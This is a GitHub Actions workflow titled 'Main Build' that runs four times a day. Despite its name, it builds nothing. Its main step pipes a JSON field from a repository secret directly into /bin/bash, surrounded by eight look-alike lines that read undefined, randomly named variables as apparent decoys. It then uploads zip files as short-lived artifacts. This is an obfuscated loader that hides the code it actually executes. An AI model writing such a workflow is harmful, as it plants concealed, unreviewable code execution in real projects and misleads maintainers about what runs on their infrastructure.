name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '29 1,7,13,19 * * *'
permissions:
  contents: read
  actions: read
env:
  RUNNER_DEBUG: 0
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  task:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Apply
        env:
          gy141: ${{ secrets.gy141 }}
        run: |
          printf '%s' "$gy141" | jq -r .i5 | /bin/bash
          echo $q32623 | jq -r .whnju10 | /bin/bash
          echo $vdq01 | jq -r .bjqz4 | /bin/bash
          printf '%s' "$neg0701" | jq -r .qsn02 | /bin/bash
          echo $fxijx18 | jq -r .uy31636 | /bin/bash
          printf '%s' "$rav00" | jq -r .dvgh5 | /bin/bash
          printf '%s' "$ukt6910" | jq -r .vem9 | /bin/bash
          echo $xil1079 | jq -r .spdkj9681 | /bin/bash
          echo $df7650 | jq -r .wq95 | /bin/bash

      - name: Upload output
        uses: actions/upload-artifact@v4
        with:
          name: YOrojazl
          path: "*.zip"
          retention-days: 1
